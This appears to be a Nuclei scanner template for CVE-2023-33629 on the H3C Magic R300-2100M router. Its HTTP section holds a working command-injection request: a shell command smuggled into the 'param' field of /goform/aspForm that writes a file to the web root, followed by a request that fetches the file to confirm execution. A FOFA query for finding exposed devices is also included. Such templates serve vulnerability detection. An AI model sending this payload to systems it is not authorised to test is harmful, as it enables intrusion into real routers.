52 lines
1.6 KiB
YAML
52 lines
1.6 KiB
YAML
id: CVE-2023-33629
|
|
|
|
info:
|
|
name: H3C Magic R300-2100M - Remote Code Execution
|
|
author: DhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-33629
|
|
- https://hackmd.io/@0dayResearch/r1UjggZfh
|
|
- https://hackmd.io/%400dayResearch/r1UjggZfh
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2023-33629
|
|
cwe-id: CWE-787
|
|
epss-score: 0.00534
|
|
epss-percentile: 0.74535
|
|
cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: h3c
|
|
product: magic_r300-2100m_firmware
|
|
fofa-query: app="H3C-Ent-Router"
|
|
tags: cve,cve2023,router,rce,h3c
|
|
variables:
|
|
filename: "{{to_lower(rand_text_alpha(7))}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /goform/aspForm HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/{{filename}});
|
|
- |
|
|
GET /{{filename}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- status_code_1 == 302
|
|
- contains(body_1, 'do_cmd.asp')
|
|
- status_code_2 == 200
|
|
- contains_all(body_2, 'www', 'www_multi')
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022100fc6b80bfe4251f53f629dd8d0c22209895c0c97662dcac45d937003a7624adc2022044ba7c0b18243b39ff5179d902130c6b2fa484b24256c0e143147aad7a7f40c3:922c64590222798bb761d5b6d8e72950
|